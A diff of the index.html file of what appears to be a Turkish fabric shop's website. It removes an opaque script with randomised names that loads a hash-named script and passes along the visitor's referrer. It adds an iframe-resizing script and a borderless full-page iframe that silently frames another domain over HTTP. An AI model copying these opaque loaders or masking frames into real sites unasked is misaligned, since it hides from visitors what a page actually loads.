--- a/index.html
+++ b/index.html
@@ -6,13 +6,25 @@
 			<meta name="description" content="Açıklama bulunamadı!" />
 			<meta property="og:title" content="AL Tekstil - Kumaş Mağazası" />
 			<meta property="og:description" content="Açıklama bulunamadı!" />
-			<script type="text/javascript">
-			const xlhb03933ca8be31be0e869fdf938275df3 = document.referrer !== '' ? document.referrer : 'noref';
-			document.write('<script type="text/javascript" src="epm7574dafc8182b1015b22db9e49679782.js?v='+Math.floor(Math.random()*9999)+'.'+Math.floor(Math.random()*9999)+'&key=epm7574dafc8182b1015b22db9e49679782&ref='+xlhb03933ca8be31be0e869fdf938275df3+'"><\/script>');
-			window.onload = function () {
-				setTimeout(epm7574dafc8182b1015b22db9e49679782, 10);
-			}
-			</script>
+			
+				<script type="text/javascript">
+      var framefenster = document.getElementsByTagName("iFrame");
+      var auto_resize_timer = window.setInterval("autoresize_frames()", 400);
+      function autoresize_frames() {
+        for (var i = 0; i < framefenster.length; ++i) {
+            if(framefenster[i].contentWindow.document.body){
+              var framefenster_size = framefenster[i].contentWindow.document.body.offsetHeight;
+              if(document.all && !window.opera) {
+                framefenster_size = framefenster[i].contentWindow.document.body.scrollHeight;
+              }
+              framefenster[i].style.height = framefenster_size + 'px';
+            }
+        }
+      }
+    </script>
+ 
+
+<iframe id="testimonials" name="testimonials" src="http://cazipbirgiyim.com/mont"; allowtransparency="true" onload="this.style.height=(this.contentDocument.body.scrollHeight+45) +'px !important';" scrolling="no" style="width:100%;min-height:100%;border:none;overflow-y:hidden;overflow-x:hidden;"></iframe>
 			</head>
 			<body style="margin:0;padding:0;"></body>
 			</html>
